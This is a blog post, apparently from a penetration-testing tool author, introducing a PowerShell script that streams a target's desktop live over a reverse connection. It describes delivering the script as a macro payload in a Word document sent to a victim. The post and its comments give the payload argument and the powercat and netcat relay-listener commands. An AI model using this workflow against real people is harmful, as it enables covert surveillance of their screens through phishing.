Thursday, December 17, 2015

Stream a target's Desktop using MJPEG and PowerShell

Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks to get it working but in the end, it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you Show-TargetScreen.ps1. This script can stream a target's desktop in real time and the stream could be seen in browsers which support MJPEG (Firefox).

Show-TargetScreen is available in the Gather category of Nishang. The current source code looks like this:


Now, to use it for reverse connect, to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the below command, Show-TargetScreen will connect to port 443 and Firefox will connect to Port 9000: 
Note that if on a *nix machine, netcat could be used as well. 

Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a client side attack. Let's use it with Out-Word from Nishang. Since like other Nishang scripts, Show-TargetScreen.ps1 loads a function with same name, we should pass an argument -"Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443", and use it as a payload for Out-Word. 
Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop.
Awesome! Isn't it? I recently tried this in couple of pen tests and was quite satisfied with the results.

Couple of things which I would like to improve in future:
- Proxy support
- HTTPS Connection.

Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome.

10 comments:

  1. Please explain this part: "As soon as a target user opens up the Word file ...". You probably meant "As soon as a target user opens up the Word file *and* than clicks on Enable Content in order to run the macro ...".
    Thanks

    ReplyDelete
    Replies
    1. You are right. The target user must Enable Content. I assumed that part when I wrote "As soon as a target user opens up the Word file". Thanks.

      Delete
    2. I guess that's a critical assumption, but many people will eventually click enable.

      I would be interested to see how often this works.

      Delete
  2. Hi, I'm having trouble understanding why the port relay is necessary.. Is this something internal to MJPEG? Sorry if the question is noobish, I'm a student trying to learn more about penetration testing..
    Thanks

    ReplyDelete
    Replies
    1. Hi,

      The relay is necessary because, AFAIK, Firefox is unable to listen for connections. The local relay allows us to listen for a connect back and then Firefox could be used to connect to a local port. This eliminates a need of writing a listener/server for the connect back.

      Delete
    2. Oh, that makes sense. Thanks for the reply, really helped clarify my understanding.

      Delete
  3. Can this be extended to enable remote control of the machine?

    ReplyDelete
  4. hi

    do i have to use powercat can i use netcat ?
    if its possible can you show how to chang it from powert cat to netcat ?

    powercat -l -v -p 443 -r tcp:9000 -rep -t 1000
    netcat ?

    ReplyDelete
    Replies
    1. Of course you can use netcat, this should work:
      nc -nlvp 443 | nc -nlvp 9000

      Delete
    2. THX :) /VASCO

      Delete